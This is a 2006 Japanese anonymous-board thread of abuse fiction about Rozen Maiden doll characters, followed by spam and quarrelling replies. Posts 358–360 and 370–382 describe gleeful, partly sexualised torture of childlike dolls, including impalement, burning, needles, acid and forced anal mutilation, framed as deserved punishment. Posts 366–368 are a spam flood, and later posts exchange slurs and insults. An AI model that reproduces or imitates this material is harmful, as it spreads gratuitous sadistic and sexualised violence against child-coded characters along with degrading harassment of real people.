「ぎゃはっ!」
思わず蒼星石と一葉の首を放り出してしまう翠星石。蒼星石の首はコロコロころがっていってしまう。
「ああああああああっ!蒼星石っ!待って!蒼星石ぃぃっ」
狂ったように転がる蒼星石の首は瓦礫の中に入って行ってしまった。
「蒼星石っ、あああっ!??」
やっと拾いあげた蒼星石の首、翠星石のオッドアイと対になるその瞳にガラスの破片が突き刺さってしまっていた。

「ぎゃははははっwww何やってんだ?大事な妹をケガさせて?ホントにオメェは出来の悪い姉ちゃんだなぁっぁ?!げへへへ」
「う...ぅぅぅ...このあ、悪...魔...蒼星石を返してで...す」

「ぐへへっへへへ『生き返らせて』やってもいいぜぇ??」

「えっ?...な、何をほざいてやがるです...こんなバラバラになったら、もうお父様にしか直せないはずです」
「それができるんだよなぁ...この俺様にはよぉwwぐへへへへ」
「なな直せるならさっさとやるです!蒼星石をっはやく今すぐ!」
「オメェ...ま〜だ口のきき方がなってねぇな...ま、いいぜw期待してろよ♪」

358 :名無しかわいいよ名無し:2006/02/23(木) 12:12:31 ID:7pr1PsBd
「痛っいたたたたっ!いやぁぁぁっ離すです!髪を引っ張るなです!ひきずるなです!翠星石のお尻がコンクリートで擦り切れちゃうですぅ!」
「つべこべぬかすな!てめえが鎖をはすしちまったからだろうがよぉ!!!」
どすっごずっばきっ!べきっ!!蹴りを入れるトニー。翠星石は声もかれてもはや反抗も出来ないようだ。
「ようし静かにしてろよ」
そういってトニーは瓦礫の山と化した結菱邸跡を見回す。
「俺様の情報だと...この手の旧華族のお屋敷ってのは大抵...お!あったぜ?」
床の片隅になにやら封印された入り口のようなものがあった。
「うりゃ!」
入り口の封印を蹴り、開けるトニー。屋敷の床には地下へ続く穴があった。
「入るぞクソ人形!てめえ先に行け!」
そういってトニーは翠星石を穴の下に蹴り落とした。
「きゃあぁぁぁぁぁぁ...ですぅっ〜〜〜〜〜〜〜〜〜〜...」ぐしゃ「ぎゃあああっ!!す、翠星石のお尻にヒビがぁ?!」
「そうかけっこう深いな...ロープがいるなwwだがしゃべることができるってことは酸素はあるってことだなwwwぎひひひ」

そして結菱邸の地下室へと降りていくトニー。地下では尻餅をついた状態のまま身動きできない翠星石がいた。
「うぅぅぅうう...翠星石のお尻が欠けちゃったですぅ...痛すぎるです...」
「ぼけっと座り込んでんじゃねぇ!とっとと立ちやがれこのクソ人形!」
「や、やめてです!さっき入れられた釘がお尻の穴に刺さって痛くてうごけないのです!お願いだから動かさないで欲しいです!」
「上等だコラっ」ごすっ
翠星石の尻に蹴りを入れるトニー
「ひぎう!釘が!お腹に!んんんんんんっっ〜〜〜〜〜〜〜」
「け、まったくいつまでも減らず口を叩くからそうなるだよ!!!」
「ぁ...ぁ...ぁふぁ...こ...ここは?...どこです...」
「この手の旧華族のお屋敷ってのはよぉ、普通は座敷牢とか地下牢とかあるっていうがマジでありやがったぜww
とくにこの結菱家ってのは海外貿易でもうけたっていうからよ...ほれ、あれ見てみろよ」
「こ、これは...なんです?」
翠星石が見たのはおかしな女性型の人形だったよく見ると棺おけのような形に見えなくもない。
棺おけ状の中には数十本にもおよぶ先のとがった鋼鉄せいの杭のようなモノがいっぱい見える。
「これはアイアンメイデン(鋼鉄の処女)って奴だぜぇ!中に気にいらねぇ奴をぶちこんでこのフタをしめると」
「ひぃいぃぃ!言わなくていいですぅ!やめるですぅ!」
ふと見回すと辺りには万力だの水車だの九本尾猫(ナインテイルキャット)だのコックリングに三角木馬といった拷問器具がごろごろしていた。
「け、あのじじい、厳格そうな顔してこんなモノを地下室に集めてやがったのか?案外、毎晩おめぇの妹とプレイしてたんじゃねぇの?www」
「そ、蒼星石が、そんなはしたないことをするわけがね〜ですぅ!お前といっしょにするなですぅ!」
「うるせぇな...俺が何のためにここに来たのかわからねぇっていうんじゃねーよなあ?」
「ひぐっ!ま、まさか翠星石をこの拷問器具で...?」
「へへへへっwww ど・れ・に・し・よ・お・か・な・あぁぁぁ????」
「い、いやあああああああああああああああああああああああ」

359 :名無しかわいいよ名無し:2006/02/23(木) 12:58:58 ID:7pr1PsBd
「へっ安心しろ、俺の目的はこんな古くせぇモンじゃねぇ」
「はぁはぁはぁ...へ?」
「俺の目的はなぁ...え〜と確か俺の情報だと『例のアレ』が数年前この屋敷に入荷したってことになってるんだが...」
なにやら拷問器具の間を探し回るトニー。
「おっ!あったぜ!やはり俺様の情報は頼りになるぜぇwwwおいこれを見ろ!」
「これは...なんです?」
それは二つの大きなガラスケースにたくさんのコードや電極などがとりつけられた、ヘンテコな機械だった。
奇妙なモニターやアンテナがありこちに取り付けられ何に使うものなのかまったくわけがわからない。

「へっへっへwwこれはなぁ...物質転送装置って奴だぁwwwこっちのガラスケースに入れたものを電解してこっちのガラスケースに転送して
 元の姿に再構築するっていう、それはそれは画期的な幻の一品だぜぇww」
これさえあれば飛行機やバスに乗らなくても瞬時に遠くに移動できるって、すげぇシロモノだぜぇ
ま、これは実験機でせいぜい5mくらいしか移動できないんだがなww」
「ふ...ふん、何を言うかと思えば...5mぽっちなんて歩いた方がはやいです!
 きっとこれを作った奴はお前のように頭の狂った奴に違いねぇです!」
「あわてんじゃねぇよwwwこいつのスゲェところは本来の使い方よりも副作用の方なんだぜぇ?
 ザ・フライって映画を見たことねぇか?物質転送実験しようとした科学者が自分で機械を使ったら、一匹のハエが紛れ込んでてよぉ...」
「ふ...ふん、清楚で可憐な才色兼備の翠星石はそんなえげつねぇお下劣映画なんて見ないのですぅ!」
「け、俺としたことがw口で言うより実際やってみた方がはええってかあ?案ずるより生むがやすしってなぁああ??」
と翠星石と蒼星石と一葉の首をガラスケースに放り込むトニー
「な、何するですか!ここを出しやがれです!こんなことをしたらタダじゃすまさねぇですぅ!」
「ガタガタ言えるのも今のうちだぜww幸い自家発電装置はまだ生きている。あばよ翠星石」
トニーはそういって物質転送装置のボタンをONにした。

  ブィィィィィ...ンン... イィィィィィ...ィィィィ...

物質転送装置が不気味に鳴動し機械全体が奇妙な光に包まれるとガラスケースの中の翠星石の姿がかすれて見えなくなっていく。
転送装置が翠星石を電気分解したのだ。そして装置を介してデータ化した翠星石の体の情報が隣のケースに送られていく。
見よ、もう一方のガラスケースに人型の何かが実体化してくるではないか。翠星石の体が再構築されていっているのである。

それは始まりと同様に終わった。奇妙な機械の輝きも不気味な鳴動もなくなっていた。
ただ違うのは始めに翠星石が入っていたケースは空になりもう一方のケースに翠星石の姿があったということだ。

「けけけけけけっ!!!スゲェ!転送実験は成功したぜwwもちろん副作用付きでなぁwww」

ガラスケースの中で翠星石はうめいた
「ん...す、翠星石はどうなったです...?」
と...

「ここはどこ?体が動かせない...僕はどうなったんだ?翠星石」
「蒼星石...私は...いったい...ここはまさか地下の...」

「そ、その声は蒼星石におじじっ!!??い、生き返ったですか?!!どこ?どこにいるですか!!!?」
「翠星石...首が...目が痛いよ...よくわからないけど君の背中?みたいのいが見えるよ?」
「こ、これは翠星石の...何ということだ!あの転送装置を使ってしまったのか!」

「どういうことですか?感覚がまだ戻らなくて、よく状況がわからねぇです!鏡!鏡はどこですか?」

翠星石はケースから立ち上がって地下室を鏡を探してさまよった。そして運よく大きな姿見の鏡をみつけることができた。
翠星石は自分の姿を鏡で見た
「えっ...?」
翠星石は始め自分の肩のところに珍妙な腫瘍ができているのかと思った。だがその奇妙な腫瘍は口をきいた。
「やはり...あの欠陥品を使ったのか...」

「お...おじじ?!!!?」



360 :名無しかわいいよ名無し:2006/02/23(木) 13:16:01 ID:7pr1PsBd
翠星石の肩
そこに結菱一葉の顔があった。翠星石の体との継ぎ目はなく完全に融合していた。
物質転送装置によって翠星石の体と結菱一葉の首が原子レベルまで分解し融合したからだ。

「お、おじじ?おじじの顔が顔が顔が顔がすすすすすすす翠星石のからからからから体にににににに????」
「翠星石...なんか君の髪の毛が顔にかかってよく見えないよ」
「ままままっままっまっま、まさかそそそそっそおそんなです、蒼せせせ星石わわわあぁぁつ??!?!?
う...ううううう嘘ですぅ!ここここれは夢、夢なんですぅ!翠星石は悪い夢を見てるですぅ!ホントの翠星石はジュンの部屋で鞄の中で寝てるのです!
そそそ、そうに決まってるのです!だからだから、おおおおお願いですぅぅぅ...」

翠星石は今の状況を拒絶した。だが確かめずにはいられなかった。誘惑に負けおそるおそる背中を姿見の鏡に向ける。

現実は非情だった。


       翠 星 石 の 尻 に 蒼 星 石 の 首 が 融 合 し て い た

「イやあああああああああああああああああああああああああdkdかうあkjdkh!!蒼ぉぉ星石ぃぃぃぃいぃいっ!$%&||@@!1!!!!!??」


「ぎゃはははははっ!!!!良かったなあWWWこれでいつまでも仲良し姉妹だぜぇWWWじじい付きでなぁWWWWWWWWW
翠星石!!クソするときは気をつけろよぉWWW妹が糞尿まみれになるからなあああぁ!!!」




ここまでです。
荒らしにめげず誰か続きを...

361 :名無しかわいいよ名無し:2006/02/23(木) 17:04:52 ID:D1CxmyiA
乙!!
        つ旦

362 :名無しかわいいよ名無し:2006/02/23(木) 18:13:16 ID:XBYejg63
凄い想像力とだけ言っておく

363 :名無しかわいいよ名無し:2006/02/23(木) 18:28:37 ID:eAq62t23
所詮妄想、まだまだぬるいな。


364 :名無しかわいいよ名無し:2006/02/23(木) 18:56:33 ID:XlUe0DEw
なんかこのスレを基地外スレだと思ってそこら中に貼り付けてる馬鹿がいるみたいだな。

365 :名無しかわいいよ名無し:2006/02/23(木) 19:05:49 ID:B+Z15Vg7
>1-364

・・・翠星石に、翠星石に何やってんだぁ!



366 :名無しかわいいよ名無し:2006/02/23(木) 19:09:24 ID:qkD/eTL1
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう         
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう    
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう         
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう     
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう

367 :名無しかわいいよ名無し:2006/02/23(木) 19:10:02 ID:qkD/eTL1
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう         
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう    
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう         
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう     
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう

368 :名無しかわいいよ名無し:2006/02/23(木) 19:11:09 ID:qkD/eTL1
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう         
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう    
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう         
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう     
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう
らああああああああああああらあああああああああるうううううううううううううううううううううううう

369 :名無しかわいいよ名無し:2006/02/23(木) 19:17:39 ID:yI9iAMjU
荒らすな

370 :名無しかわいいよ名無し:2006/02/23(木) 20:10:39 ID:nqdJ0WbN
ジュンと巴の見ている目の前で、
大型の剣山を置いた幼稚園児用の椅子に、泣いてあばれるクソ雛苺を無理やり座らせる。
肩から加重をかけて、剣山の針が尻に充分刺さるよう調節。
被検体のサルに使用する実験用器具でクソ雛苺が微動だにせぬよう固定。
特殊工業用鋼鉄製やすりを用いて、クソ雛苺の頭部を斜め45度から研磨してやる。
1ミリたりとも動けぬ状態のままで、かような痛苦を与えられているにも拘らず、
「いたいの〜」、「たすけてなの〜」、「トゥモエ、雛、くるしいの〜」
と、我侭な自己主張をガラス窓が振動するほどの大声で吠え続けるクソ雛苺。
自らが存在する事の誤りを真摯に謝罪し、赦しを乞う事の必要性に気付こうとさえしない。
ただひたすら己の筋の通らぬ要求のみを繰り返すクソ雛苺の許されざる醜悪な姿。
極めてゆっくりと研磨した為一週間程度を要したが、クソ雛苺の頭部は見事な半月形に。
その間に於いてもクソ雛苺の強情かつ理不尽な要求は一瞬たりとも止む事はなかった。
強制固定器具を外してくれた研磨技師に対しても感謝の言葉さえない。
それどころか、「ばかやろうなの〜」、「雛、おまえをゆるさないの〜」と己の罪業を罰し、
罪を軽減してくれた恩人を面罵する始末。
ジュンと巴に向かってトコトコよろめきながら走り寄る頭部半月形クソ雛苺。
腰を抜かしてガタガタ震える以外為す術のないジュン。
背中に隠した鞄に全神経を集中して待ち構える巴。
クソ雛苺の余りの強情さを目の当たりにして、優しい巴でさえついに決断したのだ。
「これ、いらない」と。

371 :名無しかわいいよ名無し:2006/02/23(木) 20:12:01 ID:nqdJ0WbN
クソ雛苺を銅製の支柱に有刺鉄線で固定。
頭の先からつま先までくまなくキャンピング用の固形燃料を塗り込んで点火。
固形燃料は火力が弱くて長時間燃焼するように作られている。
2〜3時間に渡ってクソ雛苺は「雛、なんにもわるいことしてないの〜」
と誤った主張を続けることだろう。存在自体が間違いだというのに。
この期に及んでなお「ごめんなさい。許してください」と正しい日本語での
謝罪に思い至る事の出来ないクソ雛苺の強情で腐り果てた性根には憐憫の情を
禁じ得ない。
さて、弱い火力で焼かれたゆえ、体表面から数ミリ程度を炭化させただけ
で身体機能には何ら影響を及ぼさない筈だ。
体表面の炭化したクソ雛苺。
髪の毛は燃え去り、頭は丸坊主。全身は真っ黒。
「熱いの〜」、「苦しいの〜」、「痛いの〜」、「助けてなの〜」
と泣き叫びながら走りよって来るクソ雛苺。
それを見て、悲鳴を上げて腰を抜かしながら逃げ出す自称雛苺大好きっ子
たちの姿。
クソ雛苺信者の醜き姿、ここに極まれり。


372 :名無しかわいいよ名無し:2006/02/23(木) 20:12:44 ID:nqdJ0WbN
雛苺は何をやっても許されない。理由は雛苺だから。
雛苺に対しては何をやっても許される。理由は雛苺だから。

あ〜釘バットでクソ苺をぶん殴って首っ玉吹っ飛ばしてやりてえ。
もっとも、首が飛んだ位じゃバカ苺は死なないだろうけどなw
首の取れた体だけでテケテケ歩き回るんじゃないか?
腹がよじれるほど面白い見せ物になること請け合い。

首 な し 呪 い 人 形 雛 苺 様 の テ ケ テ ケ 踊 り(ゲラゲラ


373 :名無しかわいいよ名無し:2006/02/23(木) 20:13:29 ID:nqdJ0WbN
クソ苺が「〜なの〜」と言うごとに一本

クソ苺が自分を「雛」と呼ぶごとに一本

クソ苺が「うにゅ〜」と言うごとに一本

20Gの注射針をクソ苺の爪の間に刺し込んでやる

「いたいの〜」
と吠えるだろうから、そこでもう一本
そうして、あっという間に20箇所の爪が針だらけ
仕方がないから腐った眼球に点滴用留置針をまた一本

自分が罰を受ける理由を悟れない愚か者
あはは、まるで剣山みたいだ
それでも
「いたいの〜」、「やめてなの〜」
ああ、また一本
「死ぬ」ということがないから未来永劫20G

死ねれば楽になれるのに
苦痛と恐怖のみがクソ苺には与えられる

「トゥモエ〜たすけてなの〜」
ああ、またか、しかたないな
今度は18Gを刺してあげよう

374 :名無しかわいいよ名無し:2006/02/23(木) 20:14:15 ID:nqdJ0WbN
クソ雛苺の目玉をスプーンでくり貫いて小便流し込んでやりたい。

クソ雛苺の腐った減らず口に熔けた鉄を流し込んでやりたい。

恐怖に泣きわめくクソ雛苺を竹篭に入れて、熱湯が煮えたぎる大ナベにゆっくり沈めてやりたい。


375 :名無しかわいいよ名無し:2006/02/23(木) 20:14:58 ID:nqdJ0WbN
クレヨンを使ったいたずらが二度と出来ないよう、罰として、

ガタガタ震えて泣きながら赦しを乞うクソ雛苺を無理やり押さえつけて、

その小さな小さな両手首を大根おろしですりおろしてやる。

「ごめんなさいなの〜」、「もうしませんなの〜」、「ゆるしてなの〜」

すっかり怯えきった表情でそう言っていたクソ雛苺。

体罰中は「いいいたいのおおおお〜」、「うぎゃあああ〜」と泣き叫んでいたクソ雛苺。

しかし、いざ体罰が終了して両手首がなくなってしまえば

「このやろうなの〜」、「おまえ、ゆるさないの〜」、「しねなの〜」

と半狂乱になってわめき出す始末。まさに強情なる事この上なし。

クソ雛苺には「真摯な謝罪と反省」という事が絶対にないのだ。

だから体罰がやむ事も決してあり得ない。無限に続く体罰の日々。


376 :名無しかわいいよ名無し:2006/02/23(木) 20:15:38 ID:nqdJ0WbN
雑草を刈る回転式芝刈り機で、クソ雛苺を腰の部分から半分に切断してやる。

尻から上と下が別々に動くクソ雛苺。足と尻だけでトコトコ走り回る下半身。

余りの激痛に髪を掻き毟りながら、「いいいたいの〜」とわめきちらして転げまわる上半身。

存在自体の罪を悟れぬ愚か者の姿。

嘲笑する通行人。指を指して笑う子供たち。

射殺を試みて失敗した警官によって清掃車が呼ばれ、焼却炉の待つ処理施設へ。

生ゴミと共に燃やされ、灰になっても死ぬことの出来ぬクソ雛苺。

クソ雛苺にとって、一切は苦しみ以外の何ものでもないのだ。

( ^∀^)キャハハハハハハハハハハ

377 :名無しかわいいよ名無し:2006/02/23(木) 20:16:27 ID:nqdJ0WbN
「お帰りのっ、ジュン登り〜」などと言ってふざけているクソ雛苺の片足を掴んで

全力で地面に叩き付けてやりたい。

首も手足も胴体もバ〜ラバラ。転がった首がオギャーオギャー泣き叫ぶ。

やかましいから髪の毛わしづかみにして、もう一度コンクリートの地面へ。

今度は頭も粉砕され、目玉がコロコロ転がっていく。血の涙を流しながら( ^∀^)ゲラゲラ


378 :名無しかわいいよ名無し:2006/02/23(木) 20:17:08 ID:nqdJ0WbN
泣き叫んで激しく抵抗するクソ雛苺に無理やり鉛の靴を履かせて大き目の空の水槽に入れてやる。

足を固定されて動けぬまま手をバタバタさせて暴れるクソ雛苺の憎々しい姿。

全能の神に祈りを捧げてから、水槽に希硫酸をゆっくり、ゆっくり、ゆ〜っくりと注ぎ込む。

ちなみに、首から上まで注いではいけない。また、決して濃硫酸を用いてはならない。

可能な限り長い時間踊らせて、罪を償わせなければならないからだ。己の存在自体の罪を。


379 :名無しかわいいよ名無し:2006/02/23(木) 20:17:48 ID:nqdJ0WbN
クソ雛苺の尻にタバスコ浣腸してやりたい。


あ? ドールだから肛門はないってか。

じゃあ作ってあげよう。大好きなジュンの見ている目の前で。

泣き叫んで暴れるクソ雛苺を無理やり押さえつけて、

錐を使ってゆっくり、ゆっくり、ゆ〜っくり時間をかけてな(キャハハハハ

380 :柏葉 巴:2006/02/23(木) 20:18:48 ID:nqdJ0WbN
あはは。汚い。なにこれ。臭いよ。うへぇ。捨てようよ。お母さん。

そうね。ひどい臭いだわ。気色悪い。吐きそうだわ。

下水に流したら詰まるわよ。生ごみかしらね。

いやあねえ。いやだわあ。雛苺だって。

381 :名無しかわいいよ名無し:2006/02/23(木) 20:20:02 ID:nqdJ0WbN
雛、かわいいの〜

雛をいじめるひとはおばかさんなの〜
雛、かわいいの〜

雛をいじめるひとはあたまのよわいひとなの〜
雛、かわいいの〜

雛をいじめるひとはいらないひとなの〜
雛、かわいいの〜

雛をいじめるひとはしんじゃえなの〜
雛、かわいいの〜

雛をいじめるひとはきょうちょうせいがないひとなの〜
雛、かわいいの〜

雛はろーぜんめいでんのおしばいのなかでいちばんのにんきものなの〜
雛、かわいいの〜

雛をなんばーわんにしてくれてありがとうなの〜
雛、かわいいの〜

雛もみいんなのことがだあいすきなの〜
雛、かわいいの〜

雛のことがすきなひとは、みいんな「ならけんけい」へゆくの〜
雛、かわいいの〜




382 :名無しかわいいよ名無し:2006/02/23(木) 20:20:51 ID:nqdJ0WbN
のりに与えられたヨーグルトを吐き出した雛苺。
御飯とジュースを一緒に食べるのが夢の雛苺
翠星石が作った料理を滅茶苦茶にした雛苺。
好きな餌の名前を擬態語でしか表現できない雛苺。
流しそうめんにビスケットを流す雛苺。
要するに食べ物を粗末にする雛苺。
話し言葉の語尾を「〜です」と言えない雛苺。
自分の事を「わたし」といえず「ひな」と呼ぶ雛苺。
空からジュースが降ってきたり牛乳が降ってきたりする雛苺。
真紅から力を分けてもらわなければ何も出来ない雛苺。
皆の邪魔をするしか能がないくせに強情さだけは誰にも負けない雛苺。
髪型と衣装だけが可愛くて顔はおそろしく不細工な雛苺。
自分で自分の事を可愛いと思っている雛苺。
猫を虐待した雛苺。
巴を殺そうとした雛苺。
怖ろしい奇形のドール。
……雛苺はいらない子。


383 :名無しかわいいよ名無し:2006/02/23(木) 20:28:28 ID:C9vmvUX2
もっと濃い奴頼むよ。


384 :名無しかわいいよ名無し:2006/02/23(木) 20:29:00 ID:nqdJ0WbN
>>370-382
面倒なので現状のままコピペしました。
「雛苺」を「翠星石」に読み替えて下さい。
あと、不具合な部分は適宜脳内で補完して下さい。

385 :名無しかわいいよ名無し:2006/02/23(木) 23:59:39 ID:Lb4N5PDl
てか何そのスレ、ふざけんな。
そいつらはローゼン見てる、読んでる人達の内の5%にもみたねーんだよ。
翠萌えや特にピーチ・ピットがこのスレの存在しったらどんだけショック受けると思ってんだ。
人形虐待なんてのは害な人もしくはキチガイ、薬チューがすることだろ。
もともとピーチ・ピットはこんなこと書かれるれるために描いてんじゃねえよ。
翠萌えのやつ等が荒らすのもわかるわ。
翠萌えだけじゃなくローゼンファンに消えろジャンクっていわれてんぞ。
ローゼンファンで組んで総荒らしするか。
どうやったらそんな風に育つんだよ。
社会や友人関係すらうまくいってなさそうな欲求不満人達の集まりだな。
価値観、趣味を押し付けんな?おしつけてんじゃねえ、警告だ。
干渉すんな?宗教の違いだけで紛争起こってる地域あるんだぞ。もっと世界を知れ。
この猟奇変態どもが。
犯罪予備軍
カス!
恥知れ!
このじゃんくですぅ!
いい加減にせいや!
以上、ローゼンファンからの苦情集<其の一>


386 :名無しかわいいよ名無し:2006/02/24(金) 00:05:28 ID:xhSqjFqe
一旦区切りつけてトニー編2部描こうと思ってんだけどどうよ?
つうか予想以上にトニー気に入った。

387 :名無しかわいいよ名無し:2006/02/24(金) 00:17:11 ID:1xmwycwg
俺もトニーは賛成だなw
結構面白いぞw
今度は385もトニーに虐待させようぜw
スペシャルゲストとして翠星石達人形を護りに来た勇敢な戦士としてさw
名前はなんでもいいからよw

388 :名無しかわいいよ名無し:2006/02/24(金) 00:19:39 ID:ZiT8+jqu
キツイやつ期待。

389 :名無しかわいいよ名無し:2006/02/24(金) 00:55:27 ID:PBaA8STm

職人さん、参考にしてください。
ローゼンメイデンの後番組の類似スレ。↓
 みんなで観鈴ちんを囲んで
http://wow.bbspink.com/leaf/kako/1009/10098/1009828071.html

390 :名無しかわいいよ名無し:2006/02/24(金) 01:06:58 ID:XwtGIwik
お前ら絶対
ロクなしに方しねぇ!

391 :名無しかわいいよ名無し:2006/02/24(金) 01:18:44 ID:RvBuvoga
>>390
過剰の愛情故に心が歪んじまってんだ。


392 :名無しかわいいよ名無し:2006/02/24(金) 01:23:41 ID:Y/zNcMqB
>>386
おお〜! 期待大!

393 :名無しかわいいよ名無し:2006/02/24(金) 02:38:52 ID:jTE7qW7K
>>384
これって翠星石虐待のネタになるね
ネタ提供ありがとう!

394 :名無しかわいいよ名無し:2006/02/24(金) 03:11:14 ID:8AFxJJ2M
翠星石はローゼンキャラで好き嫌いが最も顕著にでますよね

395 :名無しかわいいよ名無し:2006/02/24(金) 04:43:26 ID:SQwHJhzt
鼻水たらしてそうだな。
気持ち悪ー
ミニマム脳みそだな
IQ1の人達
ピーチ・ピットがかわいそう
消えろよ
ぜってーそいつらより、ドールズたちのほうが強い。なんてったって知障だからな
人間の肩書き消せよ
その内幼女誘拐しそうWWWWWWW
精神科入院ってーかそこに監禁されろ
墓に犬猫の排泄物が・・・
糞小説なんか自分の脳内だけにとどめろ。あ、脳の容量がたりないのか!
意識障害がおコテル
原作者は悲しむだろうな
子供時代どんな生活してたんだよ。親もおかしいのか?




396 :名無しかわいいよ名無し:2006/02/24(金) 05:33:00 ID:jWMj7gjA
哀れな子羊があつまるスレがあると聞いて飛んできました。
本当にどうしようもないスレですね。
心が病みきってます。
自分にとって身近な存在が同じように虐待にあったら
貴方達はどう感じるのでしょうね?
これ以上、人としての道を踏み外してしまう前に
今一度、自分達が快感を得ているその妄想と行動が
どういうことを意味しているのかよく考えたほうがいいと
思います。
世間には貴方達のような人を助けてくれる存在もあります。
よければ是非一度カウンセリングを受けてみることをおススメしますよ。

397 :名無しかわいいよ名無し:2006/02/24(金) 05:42:38 ID:SQwHJhzt
>>396
援軍感謝

下等種族だな
シナプス足りてねーんじゃねえの?
あかん、もうしんどるなこいつら
妄想の中でしか出来ない
自分の好きなもんがこうされたら自分いらんやろ
ホントは何も出来ない
猟奇にも程あり
サル?
カウンセリング必須
非道だな
自分でも虐待してろ

>>396
禿同



398 :名無しかわいいよ名無し:2006/02/24(金) 05:44:44 ID:SQwHJhzt
>>396
援軍感謝

下等種族だな
シナプス足りてねーんじゃねえの?
あかん、もうしんどるなこいつら
妄想の中でしか出来ない
自分の好きなもんがこうされたら自分いらんやろ
ホントは何も出来ない
猟奇にも程あり
サル?
カウンセリング必須
非道だな
自分でも虐待してろ

>>396
禿同

>>364
おまえだろ?
ここをかばってる時点で馬鹿


399 :名無しかわいいよ名無し:2006/02/24(金) 09:28:46 ID:daKSrO+q
苦痛を耐える顔が好きなんだよヽ(´ー`)ノ
猟奇ジャンルや人体改造と似たベクトルだよ。男性向けにはいっぱいあるじょない。
そうゆう人達が実際人体改造とかにやって萌えてると思うの?
二次元だから萌えなんだよ三次元ではグロも虫系も駄目だし。
萌え傾向は多種多様な事を知ってね。
猟奇ものやってる人達のスレやサイト全部に同じ事言ってきてから来てね



すまん釣られたかな…

400 :名無しかわいいよ名無し:2006/02/24(金) 09:54:16 ID:HocvEKQg
ノシ

401 :名無しかわいいよ名無し:2006/02/24(金) 10:10:00 ID:PBaA8STm
>>399
あの痛い文章は釣りじゃない。
虐待、好きでもないけれどわざわざこんなスレまで来て個人の嗜好を攻撃するのは
やはりいただけないと想うんだ。スレの住人を攻撃しているほうも、アニメ美少女
キャラ(しかもロリ系)に萌え狂って2ちゃんにダイブしてきた挙句、自分に合わないと
空気も読めず支離滅裂に汚い言葉を並べてしまった自分を客観的に見つめてほしい。
